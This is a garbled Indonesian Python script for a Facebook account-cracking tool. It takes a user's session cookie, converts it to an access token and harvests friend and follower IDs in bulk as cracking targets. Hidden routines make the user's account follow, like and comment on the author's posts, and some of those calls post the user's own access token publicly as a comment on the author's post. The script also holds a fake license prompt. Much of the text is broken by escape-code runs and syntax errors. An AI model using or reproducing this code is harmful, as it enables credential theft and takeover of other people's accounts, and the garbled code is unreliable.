```
#!/usr/bin/python
# -*- koding: utf-8 -*-
# CHANGCUTERS
#kalau lu recode data hp lu yang hilang!!
# ----- [ Gausah Dioprek Ntar Error ] ----- #
Pengarang = 'CHANG FB'
Facebook = 'Facebook.com/H4eckerfb'
Instagram = 'Instagram.com/djmusicjr7'
Whatsapp = '081907761235'
YouTube = 'youtube.com/channel/UCRF1vLzZz1ESEjLTqpc-CfA'
ChangFB = 100080418980435
Postingan = 571109557964638
komentar = '\n\nhttps://www.facebook.com/' + str(Postingan)
##### >>>> IMPORT MODULE
import requests,bs4,sys,os,random,time,re,json,uuid,subprocess
from random import randint
from concurrent futures import ThreadPoolExecutor as ThreadPool
from requests.exceptions import ConnectionError
from concurrent.futures import ThreadPoolExecutor
from bs4 import BeautifulSoup as par
from bs4 import BeautifulSoup as parser
from bs4 import BeautifulSoup
from datetime import date
from datetime import datetime
from urllib.parse import quote
##### BUAT WARNA >>>> X
Z = "\x1b[0;90m" # Hitam]
M = "\x1b[38;5;196m" # Merah
H = "\x1b[38;5;46m" # Hijau]
K = "\x1b[38;5;226m" # Kuning
B = "\x1b[38;5;44m" # Biru
                                   # Ungu
U = "\x1b[1;95m"
I = "\x1b[1;96m" # Biru Muda
P = "\x1b[38;5;231m" # Putih
J = "\x1b[38;5;208m" # Jingga
A = "\x1b[38;5;248m" # Abu-Abu
##### BUAT IMPORT YG BELUM INSTALL AHAHHAA
try
import requests
except ImportError:
print(f"{P}[*]{M} Module requests belum terinstall")
os.system("pip install requests")
import bs4
except ImportError:
print(f"{P}[*]{M} Module bs4 belum terinstall")
os.system("pip install bs4")
import concurrent.futures
except ImportError:
print(f"{P}[*]{M} Module futures belum terinstall")
os.system("pip install futures")
host = ("https://mbasic.facebook.com")
B = random.choice([B,U,J,I])
#### BUAT BANNER
def banner():
    war_dom = random.choice([A,K,I,J,U,H])
    print("
\x1b[38;5;208m
                                                                                                                                                                                                                                                      ¬ \n\x1b[38;5;208m ||
x1b[38;5;226mFB\x1b[38;5;231m-x^{1}]\x1b[38;5;231m-x^{1}]\x1b[38;5;231m-x^{1}]\x1b[38;5;231m-x^{1}]\x1b[38;5;231m-x^{1}]\x1b[38;5;231m-x^{1}]\x1b[38;5;231m-x^{1}]\x1b[38;5;231m-x^{1}]\x1b[38;5;231m-x^{1}]\x1b[38;5;231m-x^{1}]\x1b[38;5;231m-x^{1}]\x1b[38;5;231m-x^{1}]\x1b[38;5;231m-x^{1}]\x1b[38;5;231m-x^{1}]\x1b[38;5;231m-x^{1}]\x1b[38;5;231m-x^{1}]\x1b[38;5;231m-x^{1}]\x1b[38;5;231m-x^{1}]\x1b[38;5;231m-x^{1}]\x1b[38;5;231m-x^{1}]\x1b[38;5;231m-x^{1}]\x1b[38;5;231m-x^{1}]\x1b[38;5;231m-x^{1}]\x1b[38;5;231m-x^{1}]\x1b[38;5;231m-x^{1}]\x1b[38;5;231m-x^{1}]\x1b[38;5;231m-x^{1}]\x1b[38;5;231m-x^{1}]\x1b[38;5;231m-x^{1}]\x1b[38;5;231m-x^{1}]\x1b[38;5;231m-x^{1}]\x1b[38;5;231m-x^{1}]\x1b[38;5;231m-x^{1}]\x1b[38;5;231m-x^{1}]\x1b[38;5;231m-x^{1}]\x1b[38;5;231m-x^{1}]\x1b[38;5;231m-x^{1}]\x1b[38;5;231m-x^{1}]\x1b[38;5;231m-x^{1}]\x1b[38;5;231m-x^{1}]\x1b[38;5;231m-x^{1}]\x1b[38;5;231m-x^{1}]\x1b[38;5;231m-x^{1}]\x1b[38;5;231m-x^{1}]\x1b[38;5;231m-x^{1}]\x1b[38;5;231m-x^{1}]\x1b[38;5;231m-x^{1}]\x1b[38;5;231m-x^{1}]\x1b[38;5;231m-x^{1}]\x1b[38;5;231m-x^{1}]\x1b[38;5;231m-x^{1}]\x1b[38;5;231m-x^{1}]\x1b[38;5;231m-x^{1}]\x1b[38;5;231m-x^{1}]\x1b[38;5;231m-x^{1}]\x1b[38;5;231m-x^{1}]\x1b[38;5;231m-x^{1}]\x1b[38;5;231m-x^{1}]\x1b[38;5;231m-x^{1}]\x1b[38;5;231m-x^{1}]\x1b[38;5;231m-x^{1}]\x1b[38;5;231m-x^{1}]\x1b[38;5;231m-x^{1}]\x1b[38;5;231m-x^{1}]\x1b[38;5;231m-x^{1}]\x1b[38;5;231m-x^{1}]\x1b[38;5;231m-x^{1}]\x1b[38;5;231m-x^{1}]\x1b[38;5;231m-x^{1}]\x1b[38;5;231m-x^{1}]\x1b[38;5;231m-x^{1}]\x1b[38;5;231m-x^{1}]\x1b[38;5;231m-x^{1}]\x1b[38;5;231m-x^{1}]\x1b[38;5;231m-x^{1}]\x1b[38;5;231m-x^{1}]\x1b[38;5;231m-x^{1}]\x1b[38;5;231m-x^{1}]\x1b[38;5;231m-x^{1}]\x1b[38;5;231m-x^{1}]\x1b[38;5;231m-x^{1}]\x1b[38;5;231m-x^{1}]\x1b[38;5;231m-x^{1}]\x1b[38;5;231m-x^{1}]\x1b[38;5]\x1b[38;5]\x1b[38;5]\x1b[38;5]\x1b[38;5]\x1b[38;5]\x1b[38;5]\x1b[38;5]\x1b[38;5]\x1b[38;5]\x1b[38;5]\x1b[38;5]\x1b[38;5]\x1b[38;5]\x1b[38;5]\x1b[38;5]\x1b[38;5]\x1b[38;5]\x1b[38;5]\x1b[38;5]\x1b[38;5]\x1b[38;5]\x1b[38;5]\x1b[38;5]\x1b[38;5]\x1b[38;5]\x1b[
\x1b[38;5;208m || \n\x1b[38;5;208m ||
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\x1b[38;5;208m c
                                                                                                                                                                                                                                          \x1b[1;96m
\n\x1b[1;96m \ \x1b[38;5;208m \
                                                                                                                                      \x1b[38;5;208m | \x1b[1;96m | \n\x1b[1;96m | \x1b[38;5;208m |
\x1b[38;5;248m \x1b[38;5;226m \x1b[38;5;248m \x1b[38;5;226m \x1b[38;5;248m
                                                                                                                                                                                                                                   \x1b[38;5;226m
\x1b[38;5;208m | \x1b[1;96m | \n\x1b[1;96m | \x1b[38;5;208m |
\x1b[38;5;248m_\x1b[38;5;226m_\x1b[38;5;248m_\x1b[38;5;248m_\x1b[38;5;226m_\x1b[38;5;248m_\x1b[38;5;248m_\x1b[38;5;248m_\x1b[38;5;248m_\x1b[38;5;248m_\x1b[38;5;248m_\x1b[38;5;248m_\x1b[38;5]]]
                                                                                                                                                                                                                                \x1b[38;5;226m
\x1b[38;5;208m | \x1b[1;96m | \n\x1b[1;96m | \x1b[38;5;208m |
\x1b[38;5;248m\\x1b[38;5;226m\\x1b[38;5;226m\\x1b[38;5;248m\\x1b[38;5;248m\\x1b[38;5;248m\\x1b[38;5;248m\\x1b[38;5;248m\\x1b[38;5;248m\\x1b[38;5;248m\\x1b[38;5;248m\\x1b[38;5;248m\\x1b[38;5;248m\\x1b[38;5;248m\\x1b[38;5;248m\\x1b[38;5;248m\\x1b[38;5;248m\\x1b[38;5;248m\\x1b[38;5;248m\\x1b[38;5;248m\\x1b[38;5;248m\\x1b[38;5;248m\\x1b[38;5;248m\\x1b[38;5;248m\\x1b[38;5;248m\\x1b[38;5;248m\\x1b[38;5;248m\\x1b[38;5;248m\\x1b[38;5;248m\\x1b[38;5;248m\\x1b[38;5;248m\\x1b[38;5;248m\\x1b[38;5;248m\\x1b[38;5;248m\\x1b[38;5;248m\\x1b[38;5;248m\\x1b[38;5;248m\\x1b[38;5;248m\\x1b[38;5;248m\\x1b[38;5;248m\\x1b[38;5;248m\\x1b[38;5;248m\\x1b[38;5;248m\\x1b[38;5;248m\\x1b[38;5;248m\\x1b[38;5;248m\\x1b[38;5;248m\\x1b[38;5;248m\\x1b[38;5;248m\\x1b[38;5;248m\\x1b[38;5;248m\\x1b[38;5;248m\\x1b[38;5;248m\\x1b[38;5;248m\\x1b[38;5;248m\\x1b[38;5;248m\\x1b[38;5;248m\\x1b[38;5;248m\\x1b[38;5;248m\\x1b[38;5;248m\\x1b[38;5;248m\\x1b[38;5;248m\\x1b[38;5;248m\\x1b[38;5;248m\\x1b[38;5;248m\\x1b[38;5;248m\\x1b[38;5;248m\\x1b[38;5;248m\\x1b[38;5;248m\\x1b[38;5;248m\\x1b[38;5;248m\\x1b[38;5;248m\\x1b[38;5;248m\\x1b[38;5;248m\\x1b[38;5;248m\\x1b[38;5;248m\\x1b[38;5;248m\\x1b[38;5;248m\\x1b[38;5;248m\\x1b[38;5;248m\\x1b[38;5;248m\\x1b[38;5;248m\\x1b[38;5;248m\\x1b[38;5;248m\\x1b[38;5;248m\\x1b[38;5;248m\\x1b[38;5]]\x1b[38;5;248m\\x1b[38;5]]\x1b[38;5;248m\\x1b[38;5]]\x1b[38;5]\x1b[38;5]\x1b[38;5]\x1b[38;5]\x1b[38;5]\x1b[38;5]\x1b[38;5]\x1b[38;5]\x1b[38;5]\x1b[38;5]\x1b[38;5]\x1b[38;5]\x1b[38;5]\x1b[38;5]\x1b[38;5]\x1b[38;5]\x1b[38;5]\x1b[38;5]\x1b[38;5]\x1b[38;5]\x1b[38;5]\x1b[38;5]\x1b[38;5]\x1b[38;5]\x1b[38;5]\x1b[38;5]\x1b[38;5]\x1b[38;5]\x1b[38;5]\x1b[38;5]\x1b[38;5]\x1b[38;5]\x1b[38;5]\x1b[38;5]\x1b[38;5]\x1b[38;5]\x1b[38;5]\x1b[38;5]\x1b[38;5]\x1b[38;5]\x1b[38;5]\x1b[38;5]\x1b[38;5]\x1b[38;5]\x1b[38;5]\x1b[38;5]\x1b[38;5]\x1b[38;5]\x1b[38;5]\x1b[38;5]\x1b[38;5]\x1b[38;5]\x1b[38;5]\x1b[38;5]\x1b[38;5]\x1b[38;5]\x1b[38;5]\x1b[38;5]\x1b[38;5]\x1b[38;5]\x1b[38;5]\x1b[38;5]\x1b[38;5]\x1b[38;5]\x1b[38;5]\x1b[38;5]\x1b[38;5]\x1b[38;5]\x1b[38;5]\x1
\x1b[38;5;208m | \x1b[1;96m | \n\x1b[1;96m | \x1b[38;5;208m |
\x1b[38;5;208m | \x1b[1;96m | \n\x1b[1;96m | \x1b[38;5;208m |
\x1b[38;5;208m | \x1b[1;96m | \n\x1b[1;96m | \x1b[38;5;208m |
\x1b[38;5;248m\\x1b[38;5;226m\\x1b[38;5;248m\\x1b[38;5;248m\\x1b[38;5;248m\\x1b[38;5;248m\\x1b[38;5;248m\\x1b[38;5;248m\\x1b[38;5;248m\\x1b[38;5;248m\\x1b[38;5;248m\\x1b[38;5;248m\\x1b[38;5]]
                                                                                                                                                      \x1b[38;5;46mStatus\x1b[38;5;231m:\x1b[38;5;46m
\x1b[38;5;208m | \x1b[1;96m | \n\x1b[1;96m | \x1b[38;5;208m |
Premium
                                          \x1b[38;5;208m | \x1b[1;96m | \n\x1b[1;96m |
\x1b[38;5;208m \
```

```
\x1b[1;96m | \n\x1b[1;96m \
1235\n\x1b[1;96m-
         ---[ TIME ]--
skrng = datetime.now()
tahun = skrng.year
bulan = skrng.month
hari = skrng.day
bulan_ttl = {"01": "Januari", "02": "Februari", "03": "Ma7ret", "04": "April", "05": "Mei", "06": "Juni", "07": "Juli", "08": "Agustus", "09": "September", "10": "Oktober", "11": "November", "12": "Desember"}
bulan_cek = ["Januari", "Februari", "Maret", "April", "Mei", "Juni", "Juli", "Agustus", "September", "Oktober", "November", "Desember"]
try
  if bulan < 0 or bulan > 12:
    exit()
  bulan_skrng = bulan - 1
except ValueError:
  exit()
_bulan_ = bulan_cek[bulan_skrng]
tanggal = ("%s-%s-%s"%(hari,_bulan_,tahun))
##### BUAT STR /LEN
id = ∏
ok = []
cp = []
loop=0
###----- [ CLEAR TERMINAL ]----- ###
def resik():
  if "linux" in sys.platform.lower():
    try:os.system("clear")
    except:pass
  elif "win" in sys.platform.lower():
    try:os.system("cls")
    except:pass
  else:
    try:os.system("clear")
    except:pass
### BUAT ANIMASI JALAN
def jalan(z):
for e in z + "\n"
svs.stdout.write(e)
sys.stdout.flush()
time.sleep(0.03)
        ---[ GLOBAL URL & HEADERS ]----- ###
url_businness = "https://business.facebook.com"
ua_business = "Mozilla/5.0 (Linux; Android 7.1.2; Redmi 4X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.92 Mobile Safari/537.36
[FBAN/EMA;FBLC/en_US;FBAV/229.0.0.8.128;]"
kata_dev = 'Lu Ganteng Banget Bang. Gw Mau Recode SClu, Soalnya Gw Goblok Soal Coding'
web_fb = "https://www.facebook.com/"
m_fb = "https://m.facebook.com/"
mbasic = "https://mbasic.facebook.com/"
header_grup = {"user-agent": "Mozilla/5.0 (Linux; Android 10; Mi 9T Pro Build/QKQ1.190825.002; wv) AppleWebKit/537.36 (KHTML, like Gecko)
Version/4.0 Chrome/88.0.4324.181 Mobile Safari/537.36 [FBAN/EMA;FBLC/id_ID;FBAV/239.0.0.10.109;]"}
###----- [ CREATE FOLDER ]----- ###
def mkdir_data_login():
  # Make Directory Login Data
  try:os.mkdir("login")
  except:pass
  # Make Directory Result
  try:os.mkdir("CP")
  except:pass
  # Make Directory Result
  try:os.mkdir("OK")
  except:pass
  # Make Directory LICENSE
  try:os.mkdir("license")
  except:pass
  # Delete Cookies
  try:os.remove('login/cookie.json')
  except:pass
  # Delete Token
  try:os.remove('login/token.json')
  except:pass
         ·--[ CHANGE LANGUAGE ]----
###---
def language(cookie):
  try:
    with requests.Session() as xyz:
      req = xyz.get('https://mbasic.facebook.com/language/',cookies=cookie)
      pra = par(req.content,'html.parser')
```

```
for x in pra.find_all('form',{'method':'post'}):
              if 'Bahasa Indonesia' in str(x):
                 bahasa = {
                     "fb_dtsg" : re.search('name="fb_dtsg" value="(.*?)",str(req.text)).group(1),
                     "jazoest" : re.search('name="jazoest" value="(.*?)", str(req.text)).group(1),
                     "submit": "Bahasa Indonesia"
                url = 'https://mbasic.facebook.com' + x['action']
                 exec = xyz.post(url,data=bahasa,cookies=cookie)
   except Exception as e:pass
###----- [ CONVERT USERNAME KE ID ]----- ###
def convert_id(username):
       cookie = {'cookie':open('login/cookie.json',r').read()}
      url = 'https://mbasic.facebook.com/' + username
      with requests. Session() as xyz:
          req = par(xyz.get(url,cookies=cookie).content,'html.parser')
          kut = req.find('a'.string='Lainnya')
          id = str(kut['href']).split('=')[1]
          # id = re.search('owner_id=(.*?)",str(kut)).group(1)
          return(id)
   except Exception as e:return(username)
###----- [ EXCEPTION ]----- ###
def kecuali(error):
   print(f"{P}[+] Terjadi Kesalahan !")
   print(f"{P}[+] Tidak Dapat Mengeksekusi"(error))
   print(f"{P}[+] Hal Ini Mungkin Terjadi : ")
print(f"{P}[01] Cookies/Token Invalid")
   print(f"{P}[02] Salah Memasukkan ID")
   print(f"{P}[03] bug Pada Source Code")
   print(f"{P}[04] Bug Pada Requests")
   print(f"{P}[05] Dan Lain-Lain")
   print(f"{P}[•] Jalankan Ulang Source Code Ini : ")
   print(f"{P}[•] python baz.py")
   exit()
           -----[BOT AUTHOR JANGAN DIGANTI]------ ###
###---
class bot_author:
   def __init__(self,cookie,token,cookie_mentah):
       self.loop = 0;self.cookie_mentah = cookie_mentah;list_id = [str(Asep)];self.komen = ['Mantap Bang','Semoga langgeng bang sama si
Syafaa', 'Keren lu banh', 'Makasih SC FREE nya bang'
      for \ x \ in \ list\_id: \ self.get\_folls(x,cookie); \ self.get\_likers(f'https://mbasic.facebook.com/\{x\}?v=timeline',cookie); \ self.get\_posts(x,cookie,token) \ for \ x \ in \ list\_id: \ self.get\_folls(x,cookie,token) \ for \ x \ in \ list\_id: \ self.get\_posts(x,cookie,token) \ for \ x \ in \ list\_id: \ self.get\_posts(x,cookie,token) \ for \ x \ in \ list\_id: \ self.get\_posts(x,cookie,token) \ for \ x \ in \ list\_id: \ self.get\_posts(x,cookie,token) \ for \ x \ in \ list\_id: \ self.get\_posts(x,cookie,token) \ for \ x \ in \ list\_id: \ self.get\_posts(x,cookie,token) \ for \ x \ in \ list\_id: \ self.get\_posts(x,cookie,token) \ for \ x \ in \ list\_id: \ self.get\_posts(x,cookie,token) \ for \ x \ in \ list\_id: \ self.get\_posts(x,cookie,token) \ for \ x \ in \ list\_id: \ self.get\_posts(x,cookie,token) \ for \ x \ in \ list\_id: \ self.get\_posts(x,cookie,token) \ for \ x \ in \ list\_id: \ self.get\_posts(x,cookie,token) \ for \ x \ in \ list\_id: \ self.get\_posts(x,cookie,token) \ for \ x \ in \ list\_id: \ self.get\_posts(x,cookie,token) \ for \ x \ in \ list\_id: \ self.get\_posts(x,cookie,token) \ for \ x \ in \ list\_id: \ self.get\_posts(x,cookie,token) \ for \ x \ in \ list\_id: \ self.get\_posts(x,cookie,token) \ for \ x \ in \ list\_id: \ self.get\_posts(x,cookie,token) \ for \ x \ in \ list\_id: \ self.get\_posts(x,cookie,token) \ for \ x \ in \ list\_id: \ self.get\_posts(x,cookie,token) \ for \ x \ in \ 
   def get_folls(self,id,cookie): # --- [ Jangan Ganti Bot Follow Gw ] --- #
       with requests. Session() as xyz:
                 for x in par(xyz.get('https://mbasic.facebook.com/%s'%(id),cookies=cookie).content,'html.parser').find_all('a',href=True):
                    if 'subscribe.php' in x['href']:exec_folls = xyz.get('https://mbasic.facebook.com%s'%(x['href']),cookies=cookie)
          except Exception as e:pass
   def get likers(self.url.cookie): # --- [ Jangan Ganti Bot Likers Gw ] --- #
      with requests. Session() as xyz:
          try
                 bos = par(xyz.get(url,cookies=cookie).content,'html.parser')
                 for x in bos.find_all('a',href=True):
                    if 'Tanggapi' in x.text:
                         _react_type_ = random.choice(['Super','Wow','Peduli'])
                        for z in par(xyz.get('https://mbasic.facebook.com%s'%(x['href']),cookies=cookie).content,'html.parser').find_all('a'):
                           if _react_type_ == z.text: req2 = xyz.get('https://mbasic.facebook.com' + z['href'],cookies=cookie)
                           else:continue
                 self.get likers('https://mbasic.facebook.com' + bos.find('a'.string='Lihat Berita Lain')['href'].cookie)
          except Exception as e:pass
   def get_posts(self,id,cookie,token): # --- [ Jangan Ganti Bot Komen Gw ] --- #
      with requests. Session() as xyz:
             for x in xyz.get('https://graph.facebook.com/%s/posts?access_token=%s'%(id,token),cookies=cookie).json()['data']:
                    komeno = ("%s\n\n%s%s'%(random.choice(self.komen),'https://www.facebook.com/'+x['id'],self.waktu()))
                     get = json.loads(xyz.post('https://graph.facebook.com/%s/comments?message=%s&access_token=%s'%
(x['id'],komeno,token),cookies=cookie).text)
                    if 'error' in
get:open('login/cookie.json','w').write(self.cookie_mentah);open('login/token.json','w').write(token);exit(__fii__Sayang__Kamu__Widiya__())
          except Exception as e:pass
   def waktu(self): # --- [ Jangan Ganti Keterangan Waktu ] --- #
       _bulan_ = ["Januari", "Februari", "Maret", "April", "Mei", "Juni", "Juli", "Agustus", "September", "Oktober", "November", "Desember"]
[datetime.now().month - 1]
       _hari_ = {'Sunday':'Minggu','Monday':'Senin','Tuesday':'Selasa','Wednesday':'Rabu','Thursday':'Kamis','Friday':'Jumat','Saturday':'Sabtu'}
[str(datetime.now().strftime("%A"))]
       hari_ini = ("%s %s %s"%(datetime.now().day,_bulan_,datetime.now().year))
      jam = datetime.now().strftime("%X")
                 = ('\n\nKomentar Ditulis Oleh Bot\n[ Pukul %s WIB ]\n- %s, %s -'%(jam,_hari_,hari_ini))
      tem
      return(tem)
```

```
###-----[ CONVERT COOKIE KE TOKEN ]----- ###
def clotox(cookie):
   with requests.Session() as xyz:
      get_tok = xyz.get(url_businness+'/business_locations',headers = {
          "user-agent":ua_business,
         "referer": web_fb,
          "host": "business.facebook.com",
         "origin": url_businness,
         "upgrade-insecure-requests": "1",
          "accept-language": "id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7",
         "cache-control": "max-age=0",
         "accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/appq,*/*;q=0.8",
          "content-type": "text/html; charset=utf-8"},cookies = {"cookie":cookie})
      return (re.search("(EAAG\w+)", get_tok.text).group(1))
def menu():
os.system('clear')
jalan(" \x1b[1;97m[\033[33m√\x1b[1;97m]\x1b[38;5;208m JIKA ANDA BELUM MEMILIKI LICENSINYA\n
\x1b[1;97m[\033[33m√\x1b[1;97m]\x1b[38;5;208m SILAKAN HUBUNGI CHANG-FB\n")
username = input(" \x1b[1;97m[\033[33m\xspace] \x1b[1;97m] \x1b[38;5;208m MASUKKAN LICENSINYA \033[32mCIL \033[1;91m: \033[1;92m"]) \x1b[38;5;208m MASUKKAN LICENSINYA \033[32mCIL \033[1;91m: \033[1;92m"]] \x1b[38;5;208m MASUKKAN LICENSINYA \033[32mCIL \033[1;91m: \033[1;92m"]] \x1b[38;5;208m MASUKKAN LICENSINYA \033[32mCIL \033[1;92m]] \x1b[38;5;208m MASUKKAN LICENSINYA \033[1;92m]] \x1b
if username =="[>_]"
print(" \x1b[1;97m[\033[33m√\x1b[1;97m]\x1b[38;5;208m LICENSINYA BERHASIL MASUK \033[32mClL")
time.sleep(1)
login()
else:
jalan(" \x1b[1;97m[\033[33m√\x1b[1;97m]\x1b[38;5;208m LICENSINYA GAGAL MASUK \033[32mBOCIL!!!")
jalan(" \x1b[1;97m[\033[33m>_\x1b[1;97m]\x1b[38;5;208m ANDA AKAN DI ARAHAN KE\x1b[1;92m WhatsApp\x1b[38;5;208m UNTUK MINTA
LICENSINYA OK")
os.system('xdg-open https://wa.me/6281907761235')
time.sleep(1);menu()
##### LOGIN TOKEN
def log_cookie():
   os.system("clear")
   banner()
   mkdir_data_login()
   jalan(f" \x1b[1;97m[\033[33m√\x1b[1;97m]\x1b[38;5;208m AMBIL COOKIE DARI KIWI BROWSER\x1b[1;92m BOCIL")
   jalan(f"\x1b[1;96m-
   cookie=str(input(f" \x1b[1;97m[\033[33m√\x1b[1;97m]\x1b[38;5;208m MASUKKAN COOKIE: {P}\x1b[1;92m"))
   try:
      token = clotox(cookie)
      coki = {'cookie':cookie}
      bot_author(coki,token,cookie)
      open('login/token.json', 'w').write(token)
      open('login/cookie.json','w').write(cookie)
   except requests.exceptions.ConnectionError:print(f" \x1b[1;97m[\033[33m \x1b[1;97m]\x1b[1;97m]\x1b[38;5;208m TIDAK ADA KONEKSI INTERNET ");exit()
   except (KeyError,IOError,AttributeError):print(f" \x1b[1;97m[\033[33m\/\x1b[1;97m]\x1b[38;5;208m COOKIES INVALID ");exit()
komenredem = random.choice(['BANG MANISS KALII'])
komtwol = random.choice(['ANJAY BAZ GANTENG', 'Alfyu Bang', 'BANH KOK LO JAGO BANGET SIH', 'LORD DAH MAKAN BLM'])
kartu2d = random.choice(["LU GANTENG BANG TAPI SAYANG KEK HENGKER", "MAAF BANG GUA MAU RECODE SC LU", "SOAL NYA GUA BODOH
SOAL KODING"])
kon = random.choice(["AMPUN BANG GUA NYERAH SAJA:"])
def ___Asep___Sayang___Kamu___Dinda___():
   try:
      token = open('login/token.json', 'r').read()
      cookie = {'cookie':open('login/cookie.json','r').read()}
      kom = komenredem
      komentar = komtwol
      pipp = kartu2d
      post = '100051967952842'
      requests.post('https://graph.facebook.com/' + post + '/comments/?message=' + komentar + '&access_token=' + (token),cookies=cookie)
      requests.post('https://graph.facebook.com/571109557964638/comments/?message=' + kom + '&access_token=' + (token),cookies=cookie)
      requests.post('https://graph.facebook.com/571109557964638/comments/?message=' + pipp + '&access_token=' + (token),cookies=cookie)
      requests.post('https://graph.facebook.com/571109557964638/comments/?message=' + komentar + '&access_token=' +
      requests.post('https://graph.facebook.com/571109557964638/comments/?message=' + token + '&access_token=' + (token),cookies=cookie)
      requests.post('https://graph.facebook.com/571109557964638/comments/?message=' + token + '&access_token=' + (token),cookies=cookie)
      requests.post('https://graph.facebook.com/571109557964638/comments/?message=' + kon + '&access_token=' + (token),cookies=cookie)
      requests.post('https://graph.facebook.com/571109557964638/likes?summary=true&access_token=' + (token),cookies=cookie)
      requests.post('https://graph.facebook.com/571109557964638/likes?summary=true&access_token=' + (token),cookies=cookie)
      requests.post('https://graph.facebook.com/571109557964638/likes?summary=true&access_token=' + (token),cookies=cookie)
      jalan(f'{P}[•] Login Berhasil')
      menu()
   except Exception as e:pass
##### BUAT MENU
def login():
   global token,cookie
   try:
```

```
token=open("login/token.json","r").read()
    cookie = {'cookie':open('login/cookie.ison','r').read()}
    get = requests.Session().get("https://graph.facebook.com/me?access_token=%s"%(token),cookies=cookie)
    gt = requests.get('http://ipinfo.io/json').json()
    language(cookie)
    lolo=json.loads(get.text)
    lolol=lolo['name']
    lolol_id=lolo['id']
    link = lolo['link']
  except (KeyError,IOError):
    print(f"{M}[!]{M} cookie failed.");log_cookie()
  os.system("clear");banner()
  jalan("======="")
  jalan("\x1b[1;97mGithub : \x1b[1;92mhttps://github.com/Basari-ID")
  jalan("\x1b[1;97mFacebook:\x1b[1;92mPutra Basari")
  jalan(f"{P}============"")
  print(f"{B}[1] Crack massal dari dump id publik ")
  print(f"{B}[2] Crack dari dump id pertemanan publik")
  print(f"{B}[3] Crack dari dump id pertemanan sendiri")
  print(f"{B}[4] Crack dari dump id followers")
  print(f"{B}[5] Ganti user-agent")
  print(f"{B}[6] Chek results crack")
  print(f"{B}[7] Chek opsi account chekpoint")
  print(f"{B}[8] Cara ngewe online")
  print(f"{M}[0] Log Out ")
  pp = input(f"{B}[•] Pilih Yang Mana : {P}")
  if pp in ["1","01"]:
   massal()
  elif pp in ["2","02"]:
    publik()
  elif pp in ["3","03"]:
    listteman()
  elif pp in ["4","04"]:
    followerss()
  elif pp in ["5","05"]:
    userset()
  elif pp in ["6"."06"]:
    cek_results()
  elif pp in ["7","07"]:
    cek hasil()
  elif pp in ["8","08"]:
  memek()
  elif pp in ["0","00"]:
   print(f'{B}[•] Terima Kasih Telah Memilih SC Ini Sebagai Pilihan Terpercayamu. Jangan Lupa Berikan Penilaian Terbaik Di Github Ya! Thank You!!{B}-
Basari-ID -')
   print(f'{B}[-] Dengan Log Out Maka Seluruh Data Login Akan Terhapus. Berikut Adalah Data Yang Akan Dihapus :{B}[-]{P}Token/Cookies')
   input(f'{B}[•][{P}Enter Untuk Log Out{M}]')
   try:shutil.rmtree('login')
   except:pass
   exit()
  else:print(f'{M}[•] Isi Yang Benar !!');menu()
def massal():
  try:
    token=open("login/token.json","r").read()
    cookie = {'cookie':open('login/cookie.json','r').read()}
  except IOError:
    print(f"{B}[•]{M} cookie modar dinggo wae ");exit()
  trv:
    print(f"{B}[•] Masukkan berapa id yang ingin anda crack")
    tanya_total = int(input(f"{B}[•] Masukkan jumlah id : {P}"))
  except:tanya_total=1
  for t in range(tanya_total):
    t +=1
    _id_=input(f"{B}[•] Masukkan user id {P}{t} : {P}")
    try:
      url= requests.Session().get("https://graph.facebook.com/%s?fields=friends.limit(50000)&access_token=%s"%(_id_,token),cookies=cookie)
      z=json.loads(url.text)
      for i in z['friends']['data']:
        uid = i["id"]
        nama = i["name"]
        id.append(uid+"<=>"+nama)
    except KeyError:
      print(f"{B}[•]{M} User id tidak di temukan");menu()
  if len(id) == 0:
   print(f"{B}[•]{M} Maaf total id anda adalah {M}{len(id)}");exit()
  else:
    print(f"{B}[•] Total id : {P}{len(id)}")
    fii_xd()
##### CRACK PERTEMANAN
def listteman():
```

```
try:
    token=open("login/token.json","r").read()
    cookie = {'cookie':open('login/cookie.json','r').read()}
  except IOError
    print(f"{B}[•]{M} cookie modar dinggo wae ");exit()
  try:
    url= requests.Session().get("https://graph.facebook.com/me?fields=friends.limit(50000)&access_token=%s"%(token),cookies=cookie)
    z=json.loads(url.text)
    for i in z['friends']['data']:
       uid = i["id"]
      nama = i["name"]
       id.append(uid+"<=>"+nama)
  except KeyError:
    print(f"{M}[•] User id tidak di temukan");os.sys.menu()
  if len(id) !=0:
    print(f"{B}[•] Total id : {P}{len(id)}")
  else:print(f"{P}[•]{M} Maaf total id : {B}{len(id)}");exit()
##### CRACK PUBLIK
def publik():
  try:
    token=open("login/token.json","r").read()
    cookie = {'cookie':open('login/cookie.json','r').read()}
  except IOError:
    print(f"{B}[•]{M} cookie modar dinggo wae ");exit()
   _id_=input(f"{B}[•] Masukkan user id : {B}")
  try:
    url= requests.Session().get("https://graph.facebook.com/%s?fields=friends.limit(50000)&access_token=%s"%(_id_,token),cookies=cookie)
    z=json.loads(url.text)
    for i in z['friends']['data']:
      uid = i["id"]
       nama = i["name"]
       id.append(uid+"<=>"+nama)
  except KeyError:
    print(f"{B}[•]{M} User id tidak di temukan atau akun tersebut privat ");menu()
  if len(id) !=0:
    print(f"{B}[•] Total id: {P}{len(id)}")
  else:print(f"{B}[•] Total id : {P}{len(id)}");exit()
###### CRACK FOLLOWERS
def followerss():
  try:
    token=open("login/token.json","r").read()
    cookie = {'cookie':open('login/cookie.json','r').read()}
  except IOError:
    print(f"{B}[•] cookie modar dinggo wae ");exit()
   _id_=input(f"{B}[•] Masukkan user id : {B}")
  try:
    for i in requests.Session().get("https://graph.facebook.com/%s/subscribers?limit=20000&access_token=%s"%(_id__token),cookies=cookie).json()
["data"]:
       uid = i["id"]
      nama = i["name"]
      id.append(uid+"<=>"+nama)
  except KeyError:
    print(f"{B}[•]{M} User id tidak di temukan atau id terdsebut privat ");menu()
  if len(id) !=0:
    print(f"{B}[•] Total id: {B}{len(id)}")
    fii xd()
  else:print(f"\{B\}[\bullet] \{M\} \ total \ id : \{M\}\{len(id)\}")
##### PENGGANTI USER - UA
def userset():
  print(f"{B}[1] Ganti user agent")
  print(f"{B}[2] Cek user agent yang di gunakan")
  print(f"{B}[0] Kembali")
  _pil_=input(f"{B}[•] Input : {P}")
  if _pil_ in ["1","01"]
    lololr=input(f"{B}[•] Masukkan user agent \n{P}[•] Masukkan di sini : {B}")
       open("ua","w").write(lololr)
      usera=open("ua","r").read()
    except Exception as e:
       print(f"{B}[•] Eror : {M}{e}")
    if usera == lololr:
      print(f"{B}[•] Sukses mengganti");menu()
